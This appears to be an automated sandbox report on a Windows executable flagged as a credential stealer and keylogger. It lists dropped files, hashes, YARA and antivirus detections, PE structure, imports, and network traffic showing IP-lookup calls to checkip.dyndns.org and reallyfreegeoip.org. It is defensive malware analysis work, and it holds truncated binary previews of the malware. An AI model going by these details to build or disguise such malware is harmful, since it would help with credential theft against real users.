                                                                                                                              SHA-512:5282E64561D28CB77C92089BEAF27D83EC55B2A673BEF6EAB4DFC49BE61A0F6653E73F07A45AFBF93C407546D04BB50D9690CCBF553227A4E6CFE4F98389C211
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                              Process:C:\Users\user\Desktop\F7Xu8bRnXT.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):70656
                                                                                                                              Entropy (8bit):4.910353963160109
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                              MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                              SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                              SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                              SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe, Detection: malicious, Browse
                                                                                                                              • Filename: PO #09465610_GQ 003745_SO-242000846.exe, Detection: malicious, Browse
                                                                                                                              • Filename: IBKB.vbs, Detection: malicious, Browse
                                                                                                                              • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                                                                              • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Users\user\Desktop\F7Xu8bRnXT.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):98304
                                                                                                                              Entropy (8bit):5.678429468734117
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:kwa4JHA8xaqWUiRzGJVeygdqcyxCVf1UMR7pfpPYlM:M4JgqWUi5GJVey2qcyi+MDfpPr
                                                                                                                              MD5:0CDBE0CD3CB5C2F0B2CB17E4417D43F5
                                                                                                                              SHA1:E3AA6201E5A42ADFA1BFB4506D6852DE22E07494
                                                                                                                              SHA-256:7F73743991E06E23B0A1FEC66A8FA5F194D49FBE15C58473D10798758C856D31
                                                                                                                              SHA-512:3D125DAE61F960D7E32C0EB4D301EFA3322AB8201E83FB7343EF4C28ED6B788B1906E09106F8A3052630DD880FD278623F7887ED472D7C2552DB96CB3F1C8986
                                                                                                                              Malicious:true
                                                                                                                              Yara Hits:
                                                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: unknown
                                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Florian Roth
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe, Detection: malicious, Browse
                                                                                                                              • Filename: PO #09465610_GQ 003745_SO-242000846.exe, Detection: malicious, Browse
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..v..........^.... ........@.. ....................................`.....................................W.................................................................................... ............... ..H............text...du... ...v.................. ..`.rsrc................x..............@..@.reloc...............~..............@..B................@.......H.......t...........Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....*&..( ....*.s!........s"........s#........s$........s%........*Z........o8...........*&..(9....*&........*".......*Vs....(B...t.........*..(C...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*b.r...p.oa...(....(@....*:.~.....o....&*.*:.(P....(Q....*..~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):665670656
                                                                                                                              Entropy (8bit):7.999999345077284
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:
                                                                                                                              MD5:DE61BDDC20CC8EBAC6B7BDC55517BB73
                                                                                                                              SHA1:C20FB1AF89C4C1F7A1848BB22A978430EEEA247E
                                                                                                                              SHA-256:2401372F9821847068BF952F3F1C85781F5969EB4591F5067F9840C5F7D091DC
                                                                                                                              SHA-512:1F54692A210854A7E40626D1422AA4A8C11D15341C92F0065F91C8CCD5559E967FCC7B8C75658FAF096ADD0563E4831DCD386E07071DBD270FF72E6D8FB30AD2
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1820
                                                                                                                              Entropy (8bit):2.4170562931013335
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:8PsXU1e/tz0/CSL4WWeMNDyWlT9KBQ17+AUvO4Zv7L1Q17+ANCNfBf4t2YZ/elFR:80vWLqeMNmG9KmR+O4ZvPqRMjqy
                                                                                                                              MD5:6F855ED56D27EB1076AF8E6BCB1CF43D
                                                                                                                              SHA1:F051846AF399F2FC3A9A4DB8FCCF3E608B0614F7
                                                                                                                              SHA-256:463C757C60408A5879898FFC4E201BFBE6087ED567E7DAED1B5C454AFBDD62BA
                                                                                                                              SHA-512:6EC6DCB51FF117F2FEB40E358AB7D493792046783D5CF30384D8EF18AE1D8332F31FFFA5D05F3C52A2564A943E087A41A119AACAF0FFB39F5BB8FFB0AE707F8F
                                                                                                                              Malicious:false
                                                                                                                              Preview:L..................F.@......................................................5....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.4.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe...............................................................................................................
                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Entropy (8bit):7.704531027076301
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:F7Xu8bRnXT.exe
                                                                                                                              File size:354'304 bytes
                                                                                                                              MD5:d023bb01175d237f56d56467e5806525
                                                                                                                              SHA1:bd936a27e63e60361d1191d058d13418084c7d04
                                                                                                                              SHA256:75691dfc15e24ea4920f9309bc68aedf808fb60379c0410d898cafaab4f8328b
                                                                                                                              SHA512:2a1d38ae823bea20a30229ea96d4e72a56bf1ed963cc4641e16a36dc1b5dacd96b8c0d6b05b47b527acddf7ccb3efdf562902757a84e8169787a9fb3960ce7ce
                                                                                                                              SSDEEP:6144:dDKW1Lgbdl0TBBvjc/7kNVMWCGtJ3kmGz3R9/GP54i7hPTCml3eJrG:Vh1Lk70TnvjcwNAGtJ8r/GBR74w66
                                                                                                                              TLSH:C874E02470D1C2B2C47B117084EACB769A397032577A92D7BBDD1B7AAF103E5A3361C9
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................,.?g....PE..L...t..P..........#........
                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                              Entrypoint:0x40cd2f
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:5
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:5
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:5
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:bf5a4aa99e5b160f8521cadd6bfe73b8
                                                                                                                              Instruction
                                                                                                                              call 00007FB69882AF46h
                                                                                                                              jmp 00007FB698825109h
                                                                                                                              mov edi, edi
                                                                                                                              push ebp
                                                                                                                              mov ebp, esp
                                                                                                                              sub esp, 20h
                                                                                                                              mov eax, dword ptr [ebp+08h]
                                                                                                                              push esi
                                                                                                                              push edi
                                                                                                                              push 00000008h
                                                                                                                              pop ecx
                                                                                                                              mov esi, 0041F058h
                                                                                                                              lea edi, dword ptr [ebp-20h]
                                                                                                                              rep movsd
                                                                                                                              mov dword ptr [ebp-08h], eax
                                                                                                                              mov eax, dword ptr [ebp+0Ch]
                                                                                                                              pop edi
                                                                                                                              mov dword ptr [ebp-04h], eax
                                                                                                                              pop esi
                                                                                                                              test eax, eax
                                                                                                                              je 00007FB69882526Eh
                                                                                                                              test byte ptr [eax], 00000008h
                                                                                                                              je 00007FB698825269h
                                                                                                                              mov dword ptr [ebp-0Ch], 01994000h
                                                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                                                              push eax
                                                                                                                              push dword ptr [ebp-10h]
                                                                                                                              push dword ptr [ebp-1Ch]
                                                                                                                              push dword ptr [ebp-20h]
                                                                                                                              call dword ptr [0041B000h]
                                                                                                                              leave
                                                                                                                              retn 0008h
                                                                                                                              ret
                                                                                                                              mov eax, 00413563h
                                                                                                                              mov dword ptr [004228E4h], eax
                                                                                                                              mov dword ptr [004228E8h], 00412C4Ah
                                                                                                                              mov dword ptr [004228ECh], 00412BFEh
                                                                                                                              mov dword ptr [004228F0h], 00412C37h
                                                                                                                              mov dword ptr [004228F4h], 00412BA0h
                                                                                                                              mov dword ptr [004228F8h], eax
                                                                                                                              mov dword ptr [004228FCh], 004134DBh
                                                                                                                              mov dword ptr [00422900h], 00412BBCh
                                                                                                                              mov dword ptr [00422904h], 00412B1Eh
                                                                                                                              mov dword ptr [00422908h], 00412AABh
                                                                                                                              ret
                                                                                                                              mov edi, edi
                                                                                                                              push ebp
                                                                                                                              mov ebp, esp
                                                                                                                              call 00007FB6988251FBh
                                                                                                                              call 00007FB69882BA80h
                                                                                                                              cmp dword ptr [ebp+00h], 00000000h
                                                                                                                              Programming Language:
                                                                                                                              • [ASM] VS2008 build 21022
                                                                                                                              • [IMP] VS2005 build 50727
                                                                                                                              • [C++] VS2008 build 21022
                                                                                                                              • [ C ] VS2008 build 21022
                                                                                                                              • [LNK] VS2008 build 21022
                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x215b40x50.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x34690.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x1b1c00x1c.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x20da00x40.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x184.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x10000x197180x198006413732e7b06745a190ef2aab74145e1False0.5789483762254902data6.748608897608133IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rdata0x1b0000x6db40x6e005826801f33fc1b607aa8e942aa92e9faFalse0.5467329545454546data6.442956247632331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .data0x220000x30c00x16002fe51a72ede820cd7cf55a77ba59b1f4False0.3126775568181818data3.2625868398009703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .rsrc0x260000x346900x34800629b28f255d8a5b591e5e806b1aa217cFalse0.9951311383928572data7.998003635666281IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                              RT_RCDATA0x261240x34073data1.0003331659682695
                                                                                                                              RT_RCDATA0x5a1980x20data1.28125
                                                                                                                              RT_VERSION0x5a1b80x24cdata0.467687074829932
                                                                                                                              RT_MANIFEST0x5a4040x28cXML 1.0 document, ASCII text0.46319018404907975
                                                                                                                              DLLImport
                                                                                                                              KERNEL32.dllRaiseException, GetLastError, MultiByteToWideChar, lstrlenA, InterlockedDecrement, GetProcAddress, LoadLibraryA, FreeResource, SizeofResource, LockResource, LoadResource, FindResourceA, GetModuleHandleA, Module32Next, CloseHandle, Module32First, CreateToolhelp32Snapshot, GetCurrentProcessId, SetEndOfFile, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, GetLocaleInfoA, HeapFree, GetProcessHeap, HeapAlloc, GetCommandLineA, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, ReadFile, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, FlushFileBuffers, SetFilePointer, SetHandleCount, GetFileType, GetStartupInfoA, RtlUnwind, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CompareStringA, CompareStringW, SetEnvironmentVariableA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
                                                                                                                              ole32.dllOleInitialize
                                                                                                                              OLEAUT32.dllSafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector, VariantClear, VariantInit, SysFreeString, SysAllocString
                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-11-25T13:39:27.754596+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549721158.101.44.24280TCP
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 25, 2024 13:39:25.827698946 CET4972180192.168.2.5158.101.44.242
                                                                                                                              Nov 25, 2024 13:39:25.947834015 CET8049721158.101.44.242192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:25.947932005 CET4972180192.168.2.5158.101.44.242
                                                                                                                              Nov 25, 2024 13:39:25.948187113 CET4972180192.168.2.5158.101.44.242
                                                                                                                              Nov 25, 2024 13:39:26.068057060 CET8049721158.101.44.242192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:27.274657011 CET8049721158.101.44.242192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:27.310360909 CET4972180192.168.2.5158.101.44.242
                                                                                                                              Nov 25, 2024 13:39:27.430525064 CET8049721158.101.44.242192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:27.709492922 CET8049721158.101.44.242192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:27.754595995 CET4972180192.168.2.5158.101.44.242
                                                                                                                              Nov 25, 2024 13:39:28.590810061 CET49724443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 13:39:28.590861082 CET44349724172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:28.590920925 CET49724443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 13:39:28.647546053 CET49724443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 13:39:28.647577047 CET44349724172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:29.875833988 CET44349724172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:29.875956059 CET49724443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 13:39:29.891925097 CET49724443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 13:39:29.891943932 CET44349724172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:29.892358065 CET44349724172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:30.026913881 CET49724443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 13:39:30.071336031 CET44349724172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:30.357765913 CET44349724172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:30.357893944 CET44349724172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:30.357952118 CET49724443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 13:39:30.431936979 CET49724443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 13:40:32.709333897 CET8049721158.101.44.242192.168.2.5
                                                                                                                              Nov 25, 2024 13:40:32.709388971 CET4972180192.168.2.5158.101.44.242
                                                                                                                              Nov 25, 2024 13:41:07.723992109 CET4972180192.168.2.5158.101.44.242
                                                                                                                              Nov 25, 2024 13:41:07.845007896 CET8049721158.101.44.242192.168.2.5
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 25, 2024 13:39:25.632941961 CET5911453192.168.2.51.1.1.1
                                                                                                                              Nov 25, 2024 13:39:25.772130966 CET53591141.1.1.1192.168.2.5
                                                                                                                              Nov 25, 2024 13:39:28.097711086 CET5054053192.168.2.51.1.1.1
                                                                                                                              Nov 25, 2024 13:39:28.589934111 CET53505401.1.1.1192.168.2.5
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Nov 25, 2024 13:39:25.632941961 CET192.168.2.51.1.1.10x4076Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 13:39:28.097711086 CET192.168.2.51.1.1.10x35ccStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Nov 25, 2024 13:39:25.772130966 CET1.1.1.1192.168.2.50x4076No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 25, 2024 13:39:25.772130966 CET1.1.1.1192.168.2.50x4076No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 13:39:25.772130966 CET1.1.1.1192.168.2.50x4076No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 13:39:25.772130966 CET1.1.1.1192.168.2.50x4076No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 13:39:25.772130966 CET1.1.1.1192.168.2.50x4076No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 13:39:25.772130966 CET1.1.1.1192.168.2.50x4076No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 13:39:28.589934111 CET1.1.1.1192.168.2.50x35ccNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 13:39:28.589934111 CET1.1.1.1192.168.2.50x35ccNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                              • reallyfreegeoip.org
                                                                                                                              • checkip.dyndns.org
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.549721158.101.44.242802200C:\Users\user\AppData\Local\Temp\server01.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 25, 2024 13:39:25.948187113 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Nov 25, 2024 13:39:27.274657011 CET320INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 25 Nov 2024 12:39:27 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 103
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
